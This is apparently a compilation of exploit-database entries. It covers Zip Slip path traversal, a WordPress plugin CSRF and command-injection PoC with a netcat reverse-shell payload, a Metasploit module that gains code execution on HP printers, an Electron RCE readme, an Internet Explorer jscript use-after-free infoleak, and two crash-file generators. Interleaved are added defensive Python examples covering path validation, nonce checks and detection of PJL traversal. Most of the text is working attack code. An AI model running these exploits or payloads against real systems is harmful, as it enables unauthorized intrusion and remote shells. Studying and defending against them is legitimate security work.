    Content-Length: 16
    Cookie: last_position=%2F; PHPSESSID=na248cef3f937mtql67dvu8fk5
    Connection: close
   
    path=exploit.zip

Base64-encoded example of exploit.zip, which creates source.txt in the /tmp/ directory:

    UEsDBBQAAAAAALZNmkR7I19kDgAAAA4AAAAmAAAALi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vdG1w
    L3NvdXJjZS50eHR1cGxvYWRzIGZvbGRlclBLAQIUAxQAAAAAALZNmkR7I19kDgAAAA4AAAAmAAAA
    AAAAAAAAAADtgQAAAAAuLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi90bXAvc291cmNlLnR4dFBLBQYA
    AAAAAQABAFQAAABSAAAAAAA=

It is possible to create archives whose entry names contain ../../ as part of the file path. This class of bug is now known as Zip Slip, but it is an old one.

It is not possible to upload .php files or an .htaccess file using this method, but it is possible to create other files with "legal" extensions elsewhere on the system, which may lead to remote code execution if the server runs with enough privileges, for example, to create cron jobs.
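Both issues come down to the same missing check: the user-supplied name must be resolved against the intended base directory before any file is read or written. The Python below is an added example, not Responsive FileManager's code (which is PHP), of that check applied once to a file parameter like the one in #1 and once to every entry of an archive before extraction as in #2. The archive is constructed in memory with an entry name modelled on the one in the Base64 sample above; the base directory /srv/filemanager/source is an assumed path.

```python
import io
import os
import zipfile

def safe_join(base_dir, user_path):
    """Resolve user_path under base_dir; None if the result escapes base_dir.
    This is the check missing from the file= parameter in #1."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    if target == base or target.startswith(base + os.sep):
        return target
    return None

def unsafe_zip_members(zip_bytes, dest_dir):
    """Entry names that would land outside dest_dir: '..' traversal as in #2,
    and absolute names, which os.path.join would treat as replacing dest_dir."""
    bad = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            if name.startswith(("/", "\\")) or os.path.isabs(name):
                bad.append(name)
            elif safe_join(dest_dir, name) is None:
                bad.append(name)
    return bad

def safe_extract(zip_bytes, dest_dir):
    """Check every entry before writing anything; one bad entry rejects the archive."""
    bad = unsafe_zip_members(zip_bytes, dest_dir)
    if bad:
        raise ValueError("refusing to extract; entries escape %s: %r" % (dest_dir, bad))
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        zf.extractall(dest_dir)

def build_zip(entries):
    """Constructed test archive. entries maps entry name -> bytes; names are
    stored verbatim, so '../' sequences survive just as in the sample above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()

if __name__ == "__main__":
    base = "/srv/filemanager/source"   # assumed upload root
    print(safe_join(base, "../../../../etc/passwd"))
    evil = build_zip({"../../../../../../../../tmp/source.txt": b"uploads folder",
                      "notes/readme.txt": b"fine"})
    print(unsafe_zip_members(evil, base))
```

Python's own ZipFile.extract strips leading ".." components on its own, but the PHP extractor on the page and many other unzip routines do not, so the entry check is the part that matters; rejecting the whole archive on the first bad entry also avoids a half-written extraction.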
            
<!--
About:
===========
Component: Plainview Activity Monitor (Wordpress plugin)
Vulnerable version: 20161228 and possibly prior
Fixed version: 20180826
CVE-ID: CVE-2018-15877
CWE-ID: CWE-78
Author:
- Lydéric Lefebvre (https://www.linkedin.com/in/lydericlefebvre)

Timeline:
===========
- 2018/08/25: Vulnerability found
- 2018/08/25: CVE-ID request
- 2018/08/26: Reported to developer
- 2018/08/26: Fixed version
- 2018/08/26: Advisory published on GitHub
- 2018/08/26: Advisory sent to bugtraq mailing list

Description:
===========
The Plainview Activity Monitor WordPress plugin is vulnerable to OS
command injection, which allows an attacker to remotely execute
commands on the underlying system. The application passes unsafe
user-supplied data from the ip parameter to an OS command in
activities_overview.php.
Privileges are required to exploit this vulnerability, but this
plugin version is also vulnerable to CSRF and reflected XSS. Combined,
these three vulnerabilities lead to remote command execution with a
single admin click on a malicious link.

References:
===========
https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/

PoC:
-->

<html>
  <!--  Wordpress Plainview Activity Monitor RCE
        [+] Version: 20161228 and possibly prior
        [+] Description: Combine OS Commanding and CSRF to get reverse shell
        [+] Author: Lydéric LEFEBVRE
        [+] CVE-ID: CVE-2018-15877
        [+] Usage: Replace 127.0.0.1 & 9999 with your IP and port to get a reverse shell
        [+] Note: Many reflected XSS exist in this plugin and can be combined with this exploit as well
  -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" />
      <input type="hidden" name="lookup" value="Lookup" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
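The chain above needs both an unvalidated ip parameter and a form that can be submitted cross-site. The Python below is an added example, not the plugin's code (which is PHP), of closing both halves: the lookup target is restricted to a single IP literal or DNS name and handed to the tool as an argument vector rather than a shell string, and the handler refuses requests without a valid per-user, per-action nonce. It assumes the lookup shells out to dig (the advisory does not say which tool the plugin runs) and uses a simple HMAC nonce scheme rather than WordPress's wp_nonce functions; the secret and session in the usage are constructed.

```python
import hashlib
import hmac
import ipaddress
import re
import subprocess

# One DNS name: labels of 1-63 alphanumerics/hyphens, not starting or ending with '-'.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\.?$")

def validate_lookup_target(value):
    """Accept exactly one IP literal or DNS name; spaces, '|', ';', '`' never pass."""
    try:
        ipaddress.ip_address(value)
        return value
    except ValueError:
        pass
    if HOSTNAME_RE.match(value):
        return value
    raise ValueError("not a host name or IP address: %r" % value)

def lookup_argv(value):
    """Argument vector for the lookup tool (dig assumed). With no shell in the
    path, a value like 'google.fr| nc ...' would be one inert argument, and the
    validator rejects it anyway."""
    return ["dig", "+short", validate_lookup_target(value)]

def run_lookup(value):
    return subprocess.run(lookup_argv(value), capture_output=True, text=True,
                          timeout=10).stdout

# CSRF half: a nonce bound to the user and the action (simple HMAC scheme,
# assumed here; WordPress's wp_create_nonce/check_admin_referer differ in detail).
ACTION = "plainview_activity_monitor_lookup"

def make_nonce(secret, user_id, action=ACTION):
    return hmac.new(secret, ("%s:%s" % (user_id, action)).encode(),
                    hashlib.sha256).hexdigest()[:20]

def verify_nonce(secret, user_id, presented, action=ACTION):
    expected = make_nonce(secret, user_id, action).encode()
    return hmac.compare_digest(expected, (presented or "").encode())

def handle_lookup(form, session, secret):
    """What the activity_tools POST handler should do before touching 'ip'."""
    if not verify_nonce(secret, session["user_id"], form.get("_nonce")):
        return {"status": 403, "error": "missing or invalid nonce"}
    try:
        argv = lookup_argv(form.get("ip", ""))
    except ValueError as err:
        return {"status": 400, "error": str(err)}
    return {"status": 200, "argv": argv}

if __name__ == "__main__":
    secret, session = b"constructed-secret", {"user_id": 1}
    form = {"ip": "google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash", "lookup": "Lookup"}
    print(handle_lookup(form, session, secret))                     # 403: CSRF form has no nonce
    form["_nonce"] = make_nonce(secret, 1)
    print(handle_lookup(form, session, secret))                     # 400: payload is not a host
```

The order matters: the nonce check runs first so that a cross-site POST like the form above is refused before the ip value is even looked at, and the validator then turns the payload into a 400 rather than a shell command.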
            
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require "rex/proto/pjl"

class MetasploitModule < Msf::Exploit::Remote

  Rank = NormalRanking

  include Msf::Exploit::Remote::SNMPClient
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HP Jetdirect Path Traversal Arbitrary Code Execution',
      'Description'    => %q{
        The module exploits a path traversal via Jetdirect to gain arbitrary code execution by
        writing a shell script that is loaded on startup to /etc/profile.d. Then, the printer
        is restarted using SNMP. Impacted printers:
        HP PageWide Managed MFP P57750dw
        HP PageWide Managed P55250dw
        HP PageWide Pro MFP 577z
        HP PageWide Pro 552dw
        HP PageWide Pro MFP 577dw
        HP PageWide Pro MFP 477dw
        HP PageWide Pro 452dw
        HP PageWide Pro MFP 477dn
        HP PageWide Pro 452dn
        HP PageWide MFP 377dw
        HP PageWide 352dw
        HP OfficeJet Pro 8730 All-in-One Printer
        HP OfficeJet Pro 8740 All-in-One Printer
        HP OfficeJet Pro 8210 Printer
        HP OfficeJet Pro 8216 Printer
        HP OfficeJet Pro 8218 Printer

        Please read the module documentation regarding the possibility for leaving an
        unauthenticated telnetd service running as a side effect of this exploit.
      },
      'Author'         => [
        'Jacob Baines', # Python PoC
        'Matthew Kienow <matthew_kienow[AT]rapid7.com>', # Metasploit module
       ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2017-2741' ],
          [ 'URL', 'https://support.hp.com/lt-en/document/c05462914' ],
          [ 'URL', 'http://tenable.com/blog/rooting-a-printer-from-security-bulletin-to-remote-code-execution' ]
        ],
      'Targets'        => [
        ['Unix (In-Memory)',
          'Platform'   => 'unix',
          'Arch'       => ARCH_CMD,
          'Payload'    => {
            'Compat' => {
              'PayloadType' => 'cmd'
            }
          },
        ]
      ],
      'Privileged'     => true,
      'DisclosureDate' => 'Apr 05 2017',
      'DefaultTarget'  => 0,
      'DefaultOptions' => {
        'PAYLOAD'  => 'cmd/unix/bind_busybox_telnetd',
        'WfsDelay' => 180
      }
    ))

    register_options(
      [
        Opt::RPORT(Rex::Proto::PJL::DEFAULT_PORT),
        OptPort.new('SNMPPORT', [true, 'The SNMP port', 161])
      ]
    )
  end

  def execute_command(cmd, opts = {})
    rpath = '0:/../../rw/var/etc/profile.d/'
    stager_script_name = opts[:stager_script_name]
    cmd = "(cd / && #{cmd}); rm -f /etc/profile.d/#{stager_script_name}"

    begin
      # use PJL to write command stager
      print_status("Connecting to port #{rport}...")

      pjl = Rex::Proto::PJL::Client.new(sock)
      pjl.begin_job

      pjl.fsinit(rpath[0..1])

      print_status("Attempting to write command stager...")
      rpath = "#{rpath}#{stager_script_name}"
      if pjl.fsdownload(cmd, rpath, is_file: false)
        print_good("Successfully wrote command stager to #{rpath}")
      else
        print_error("Failed to write command stager to #{rpath}")
        return
      end

      # verify command stager exists
      unless pjl.fsquery(rpath)
        print_error("Command stager does not exist at #{rpath}; aborting...")
        return
      end

      pjl.end_job

    rescue Rex::ConnectionError
      print_error("Connection Refused")
      raise
    end
  end

  def restart_printer
    pjl_port = datastore['RPORT']
    snmp_port = datastore['SNMPPORT']
    community = datastore['COMMUNITY']
    # Printer MIB prtGeneralReset object identifier (numeric notation)
    prt_general_reset = '1.3.6.1.2.1.43.5.1.1.3.1'
    # prtGeneralReset powerCycleReset(4) value
    power_cycle_reset = 4

    begin
      # TODO: Update when there is a clean approach to using two or more mixins that both use RPORT.
      datastore['RPORT'] = snmp_port
      print_status("Connecting to SNMP port #{rport}...")
      snmp = connect_snmp

      # get value of Printer MIB prtGeneralReset
      reset_value = snmp.get_value(prt_general_reset)
      reset_value = "''" if reset_value.is_a?(SNMP::Null)
      print_status("Initial value of prtGeneralReset OID #{prt_general_reset} => #{reset_value}")

      # set value of Printer MIB prtGeneralReset to powerCycleReset(4)
      print_status("Attempting to restart printer via SNMP...")
      varbind = SNMP::VarBind.new(prt_general_reset, SNMP::Integer.new(power_cycle_reset))
      response = snmp.set(varbind)

      if response.error_status == :noError
        print_status("Set prtGeneralReset OID #{prt_general_reset} => #{power_cycle_reset}")

        # get value of Printer MIB prtGeneralReset
        reset_value = snmp.get_value(prt_general_reset)
        reset_value = "''" if reset_value.is_a?(SNMP::Null)
        print_status("Current value of prtGeneralReset OID #{prt_general_reset} => #{reset_value}")
        print_status("Printer restarting...")

      else
        print_error("Unable to set prtGeneralReset; SNMP response error status: #{response.error_status}")
      end

    rescue SNMP::RequestTimeout
      print_error("SNMP request timeout with community '#{community}'")
      raise
    rescue SNMP::UnsupportedVersion
      print_error("Unsupported SNMP version specified; use '1' or '2c'")
      raise
    rescue Rex::ConnectionError
      print_error("Connection Refused")
      raise
    ensure
      # restore original rport value
      datastore['RPORT'] = pjl_port
    end
  end

  def exploit
    begin
      opts = {
        stager_script_name: "#{Rex::Text.rand_text_alpha(8)}.sh"
      }

      print_status("Exploiting...")
      connect
      if target.name =~ /Unix/
        execute_command(payload.encoded, opts)
      else
        execute_cmdstager(opts)
      end
      restart_printer

      return
    ensure
      disconnect
    end
  end

end
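The module's execute_command() relies on two PJL file-system commands whose NAME argument the printer resolves without confining it to the volume. The Python below is an added example, not part of the module or of Rex::Proto::PJL: it builds the same FSINIT/FSDOWNLOAD/FSQUERY job from the command syntax in HP's PJL Technical Reference (the exact bytes the Ruby helper emits are assumed to match), then parses a captured job and flags any NAME that walks above its volume root, which is what a print-server or network sensor watching port 9100 would look for. The script name and stager command in the usage are constructed.

```python
import re

UEL = b"\x1b%-12345X"   # Universal Exit Language sequence that brackets a PJL job

def pjl_fsdownload_job(volume, path, data):
    """The FSINIT/FSDOWNLOAD/FSQUERY sequence execute_command() sends, built from
    the command syntax in HP's PJL Technical Reference (the exact bytes emitted by
    Rex::Proto::PJL are assumed to match). 'path' is passed through unchanged,
    which is the printer-side bug: nothing confines it to the volume."""
    job = UEL + b"@PJL\r\n"
    job += b'@PJL FSINIT VOLUME="%s"\r\n' % volume.encode()
    job += b'@PJL FSDOWNLOAD FORMAT:BINARY SIZE=%d NAME="%s"\r\n' % (len(data), path.encode())
    job += data
    job += b'@PJL FSQUERY NAME="%s"\r\n' % path.encode()
    return job + UEL

# Detection side: every PJL file-system command carries its target in NAME="...".
FS_CMD_RE = re.compile(
    rb'@PJL\s+(FSDOWNLOAD|FSUPLOAD|FSQUERY|FSDELETE|FSMKDIR|FSDIRLIST|FSAPPEND)\b'
    rb'[^\r\n]*?NAME="([^"]*)"', re.IGNORECASE)

def pjl_file_ops(stream):
    """(command, path) for each file-system command in a captured port-9100 stream."""
    return [(m.group(1).decode().upper(), m.group(2).decode(errors="replace"))
            for m in FS_CMD_RE.finditer(stream)]

def escapes_volume(path):
    """True when the path walks above its volume root, e.g. '0:/../../rw/var/...'."""
    _, sep, rest = path.partition(":")
    if not sep:
        rest = path
    depth = 0
    for part in rest.replace("\\", "/").split("/"):
        if part == "..":
            depth -= 1
            if depth < 0:
                return True
        elif part and part != ".":
            depth += 1
    return False

def suspicious_pjl_ops(stream):
    return [(cmd, path) for cmd, path in pjl_file_ops(stream) if escapes_volume(path)]

if __name__ == "__main__":
    # Constructed stager, shaped like the one execute_command() writes.
    name = "abcdefgh.sh"
    stager = ("(cd / && id); rm -f /etc/profile.d/%s\n" % name).encode()
    job = pjl_fsdownload_job("0:", "0:/../../rw/var/etc/profile.d/" + name, stager)
    print(suspicious_pjl_ops(job))
```

Counting directory depth rather than just searching for ".." keeps a legitimate "0:/a/../b" quiet while flagging the first component that climbs past the volume root; the SNMP restart that follows is a separate signal (a prtGeneralReset set request) worth correlating with the same source address.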
            
CVE-2018-15685 - Electron WebPreferences Remote Code Execution
This is a minimal Electron application with a POC for CVE-2018-15685.

A remote code execution vulnerability has been discovered affecting apps with the ability to open nested child windows on Electron versions (3.0.0-beta.6, 2.0.7, 1.8.7, and 1.7.15). This vulnerability has been assigned the CVE identifier CVE-2018-15685.

For more information see my full write up on the Contrast Security blog (https://www.contrastsecurity.com/security-influencers/cve-2018-15685) or the write up on the official blog from Electron (https://electronjs.org/blog/web-preferences-fix)

The project contains the following files:

main.js - This is the app's main process. Note that this has nodeIntegration disabled, so it should not be possible to use "process".
index.html - This is an example page rendered by the app. It could be a remotely controlled URL, or a page from an application with an XSS. In this example it is a local file, but it still should not have access to Node bindings.
You can learn more about each of these components within the Quick Start Guide.

To Use
To clone and run this repository you'll need Git and Node.js (which comes with npm) installed on your computer. From your command line:

# Clone this repository
git clone https://github.com/matt-/CVE-2018-15685
# Go into the repository
cd CVE-2018-15685
# Install dependencies
npm install
# Run the app
npm start


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45272.zip
            
# Exploit Title: Instagram App 41.1788.50991.0 - Denial of Service (PoC)
# Exploit Author : Ali Alipour
# Date: 2018-08-25
# Vendor Homepage : https://www.instagram.com/
# Software Link Download : https://www.microsoft.com/en-us/p/instagram/9nblggh5l9xt?ocid=blitz_windowsblog&activetab=pivot%3aoverviewtab
# About : https://blogs.windows.com/windowsexperience/2016/10/13/instagram-app-for-windows-10-expands-to-pc-and-tablets/#SKp37OKfVaj7FRee.97
# Tested on : Windows 10 - 64-bit

# Steps to Reproduce
# 1. Run the python script; it creates a file named "Instagram.txt".
# 2. Copy the text inside "Instagram.txt" and start the Instagram App on Windows 10.
# 3. In the new window click "Sign Up With Phone Or Email" and select the Email tab.
# 4. Paste the content of "Instagram.txt" into the "Email Address" field.
# 5. Click "Next": the Instagram App crashes.

#!/usr/bin/python
    
buffer = "A" * 60000
payload = buffer
try:
    f=open("Instagram.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
            
<!--
There is a use-after-free vulnerability in jscript.dll related to how the lastIndex property of a RegExp object is handled. This vulnerability can be exploited through Internet Explorer or potentially through WPAD over local network. The vulnerability has been reproduced on multiple Windows versions with the most recent patches applied.

The issue is that the lastIndex property of a RegExp object is not tracked by the garbage collector. If you look at RegExpObj::LastIndex you'll see that, on x64, lastIndex gets stored in a VAR at offset 272 (at least in my version), but if you take a look at RegExpObj::ScavengeCore (which gets called by the garbage collector to track various member variables) you'll notice that that offset is not being tracked. This allows an attacker to set the lastIndex property, and after the garbage collector gets triggered, the corresponding variable is going to get freed. As JavaScript variables are all allocated in blocks by a custom allocator, to turn this into a crash the entire block of variables needs to get freed. This is similar to some already reported issues, e.g. https://bugs.chromium.org/p/project-zero/issues/detail?id=1506

PoC for IE:

=========================================================

<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">

alert('start');

var vars = [];

var r = new RegExp();

for(var i=0; i<20000; i++) {
  vars[i] = "aaaaa";
}
r.lastIndex = "aaaaa";
for(var i=20000; i<40000; i++) {
  vars[i] = "aaaaa";
}

vars.length = 0;

CollectGarbage();

alert(r.lastIndex);

alert('failed');

</script>

=========================================================


Crash log:

=========================================================

(760.650): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
jscript!PrepareInvoke+0x2b1:
000007fe`f26674f1 66390f          cmp     word ptr [rdi],cx ds:00000000`04878e98=????
0:014> r
rax=0000000000000000 rbx=000000000000400c rcx=000000000000008f
rdx=0000000000000000 rsi=0000000000000000 rdi=0000000004878e98
rip=000007fef26674f1 rsp=000000001268b080 rbp=0000000000000080
 r8=0000000004095f50  r9=0000000000000008 r10=000000000000000b
r11=0000000000000005 r12=0000000000000000 r13=000000001268b158
r14=0000000004095f68 r15=0000000000000001
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
jscript!PrepareInvoke+0x2b1:
000007fe`f26674f1 66390f          cmp     word ptr [rdi],cx ds:00000000`04878e98=????
0:014> k
 # Child-SP          RetAddr           Call Site
00 00000000`1268b080 000007fe`f26505d4 jscript!PrepareInvoke+0x2b1
01 00000000`1268b0f0 000007fe`f2674343 jscript!InvokeDispatchEx+0xb4
02 00000000`1268b280 000007fe`f263600b jscript!VAR::InvokeByDispID+0x3e303
03 00000000`1268b2d0 000007fe`f2636ee2 jscript!CScriptRuntime::Run+0x3a0c
04 00000000`1268b680 000007fe`f2636d4b jscript!ScrFncObj::CallWithFrameOnStack+0x162
05 00000000`1268b890 000007fe`f2636bb5 jscript!ScrFncObj::Call+0xb7
06 00000000`1268b930 000007fe`f263b690 jscript!CSession::Execute+0x19e
07 00000000`1268ba00 000007fe`f2644027 jscript!COleScript::ExecutePendingScripts+0x17a
08 00000000`1268bad0 000007fe`f2643826 jscript!COleScript::ParseScriptTextCore+0x267
09 00000000`1268bbc0 000007fe`e8effdd1 jscript!COleScript::ParseScriptText+0x56
0a 00000000`1268bc20 000007fe`e9661d3c MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
0b 00000000`1268bca0 000007fe`e8f00d96 MSHTML!CScriptCollection::ParseScriptText+0x37f
0c 00000000`1268bd80 000007fe`e8f007d1 MSHTML!CScriptData::CommitCode+0x3d9
0d 00000000`1268bf50 000007fe`e8f00561 MSHTML!CScriptData::Execute+0x283
0e 00000000`1268c010 000007fe`e9663655 MSHTML!CHtmScriptParseCtx::Execute+0x101
0f 00000000`1268c050 000007fe`e8ee86c7 MSHTML!CHtmParseBase::Execute+0x235
10 00000000`1268c0f0 000007fe`e8e5ba49 MSHTML!CHtmPost::Broadcast+0x90
11 00000000`1268c130 000007fe`e8ec282f MSHTML!CHtmPost::Exec+0x4bb
12 00000000`1268c340 000007fe`e8ec2780 MSHTML!CHtmPost::Run+0x3f
13 00000000`1268c370 000007fe`e8ec4532 MSHTML!PostManExecute+0x70
14 00000000`1268c3f0 000007fe`e8ec7f43 MSHTML!PostManResume+0xa1
15 00000000`1268c430 000007fe`e8ea5fb8 MSHTML!CHtmPost::OnDwnChanCallback+0x43
16 00000000`1268c480 000007fe`e96d488f MSHTML!CDwnChan::OnMethodCall+0x41
17 00000000`1268c4b0 000007fe`e8dc9dc5 MSHTML!GlobalWndOnMethodCall+0x254
18 00000000`1268c550 00000000`76e79bbd MSHTML!GlobalWndProc+0x150
19 00000000`1268c5d0 00000000`76e798c2 USER32!UserCallWinProcCheckWow+0x1ad
1a 00000000`1268c690 000007fe`effe42fe USER32!DispatchMessageWorker+0x3b5
1b 00000000`1268c710 000007fe`f004ad2b IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
1c 00000000`1268f990 000007fe`fec5a2cf IEFRAME!LCIETab_ThreadProc+0x3a3
1d 00000000`1268fac0 000007fe`f77e925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
1e 00000000`1268faf0 00000000`76d559cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
1f 00000000`1268fb40 00000000`76fb383d kernel32!BaseThreadInitThunk+0xd
20 00000000`1268fb70 00000000`00000000 ntdll!RtlUserThreadStart+0x1d

=========================================================


Attached is a started-but-never-finished exploit that only leaks the heap address of the use-after-free allocation. It was tested against IE in 64-bit single process mode (via TabProcGrowth registry flag). In a 32-bit process (default) the structure sizes/offsets would likely be different so it would not work as is.
-->

<!-- saved from url=(0014)about:internet -->
<meta http-equiv="X-UA-Compatible" content="IE=7"></meta>
<script language="Jscript.Encode">

var objects = [];
var regexps = [];
var magicIndex = 0;
var magicObject;
var allocationAddress;

function infoLeak() {
   // alert("in infoleak");
   // leak the "next" pointer from one of the NameList entries
   allocationAddress = regexps[magicIndex + 6].lastIndex / 4.9406564584124654E-324 - 0x560;
   prompt("allocationAddress", allocationAddress.toString(16));
}

// specially crafted property name that allows us to test for successful exploitation
// and figure out which object got reallocated over freed block
function getName4(index) {
  return String.fromCharCode(0,0,0,0,0,0,0,0, 3,0,0,0, index,0,0,0, 0,0,0,0, 3,0,0,0, 0x1337,0,0,0, 0,0,0,0);
}

function exploit() {

  // todo: trigger LFH for 0x970 allocation size, might make the exploit more reliable

  alert('start');

  // crafted property names
  var name1 = Array(570).join('a'); // makes NameList allocation of exactly 0x970 bytes
  var name2 = 'bbbbbbbbbbb'; // length chosen to align the next item correctly
  var name3 = String.fromCharCode(5); // 5 is the double var type, used to leak the "next" pointer

  // allocate empty objects
  for(var i=0; i<500; i++) {
    var o = {};
    objects[i] = o;
  }

  // allocate regexp objects
  for(var i=0;i<10000;i++) {
    regexps[i] = new RegExp();
  }

  // allocate variables that aren't being tracked by GC
  for(var i=0;i<10000;i++) {
    regexps[i].lastIndex = "aaaaa";
  }

  // trigger freeing of var blocks
  CollectGarbage();

  // allocate NameList blocks over freed allocations
  for(var i=0; i<500; i++) {
    objects[i][name1] = 1;
  }

  // fill NameList blocks with other data useful for the infoleak stage
  for(var i=0; i<500; i++) {
    objects[i][name2] = 1;
    objects[i][name3] = 1;
    objects[i][getName4(i)] = 1;
  }

  for(var i=0;i<10000;i++) {
    try {
      if(regexps[i].lastIndex == 0x1337) {
        alert("win");
        magicIndex = i;
        magicObject = objects[regexps[i+1].lastIndex];
        infoLeak();
        return;
      }
    } catch(e) { }
  }

  alert('failed');
}

exploit();

</script>
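The only arithmetic in the leak stage is the line in infoLeak() that divides lastIndex by 4.9406564584124654E-324 and subtracts 0x560. The Python below is an added example, not part of the PoC, showing why that recovers the raw pointer: a small integer bit pattern reinterpreted as a double is a denormal, and dividing a denormal by the smallest denormal (2^-1074) yields its mantissa exactly. The addresses used are taken from the crash log above; the 0x560 offset is the PoC's own.

```python
import struct

SMALLEST_DENORMAL = 4.9406564584124654e-324   # 2**-1074, the divisor used in infoLeak()

def qword_as_double(raw):
    """Reinterpret a 64-bit pattern as the double with the same bits: what the script
    sees when a VAR of type 5 (double) sits on top of a pointer."""
    return struct.unpack("<d", struct.pack("<Q", raw))[0]

def double_as_qword(d):
    return struct.unpack("<Q", struct.pack("<d", d))[0]

def leak_qword_from_double(d):
    """Recover the raw bits with the PoC's division. A pattern below 2**52 has a zero
    exponent field, so the double is a denormal m * 2**-1074 and d / 2**-1074 == m
    exactly. User-mode x64 pointers (< 2**47) always satisfy this; a larger pattern
    would have a non-zero exponent and the division would no longer give the bits."""
    if double_as_qword(d) >= (1 << 52):
        raise ValueError("bit pattern is not a denormal; divide-by-min trick does not apply")
    return int(d / SMALLEST_DENORMAL)

def allocation_address(leaked_next_ptr, slack=0x560):
    """infoLeak(): the leaked NameList 'next' pointer minus the PoC's 0x560 offset."""
    return leak_qword_from_double(leaked_next_ptr) - slack

if __name__ == "__main__":
    for raw in (0x04878e98, 0x000007fef26674f1):   # rdi and rip from the crash log
        d = qword_as_double(raw)
        print("%#018x -> %r -> %#x" % (raw, d, leak_qword_from_double(d)))
```

The range check is the practical caveat: the trick silently returns garbage for a non-denormal pattern, so a leak helper should refuse rather than feed a wrong base address into the next stage.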
            
# Exploit Title: Cisco Network Assistant 6.3.3 - 'Cisco Login' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-08-27
# Vendor Homepage: https://www.cisco.com/
# Software Link : https://software.cisco.com/download/home/286277276/type/280775097/release/6.3.3
# Tested Version: 6.3.3
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash: 
# 1.- Run python code : python Cisco_Network_Assistant_6.3.3.py
# 2.- Open Cisco_Network_Assistant_6.3.3.txt and copy content to clipboard
# 3.- Open Cisco Network Assistant
# 4.- Authenticate to Cisco CCO
# 5.- Paste ClipBoard on "Cisco Login"
# 6.- Crashed

#!/usr/bin/env python
 
buffer = "\x41" * 6900000
f = open ("Cisco_Network_Assistant_6.3.3.txt", "w")
f.write(buffer)
f.close()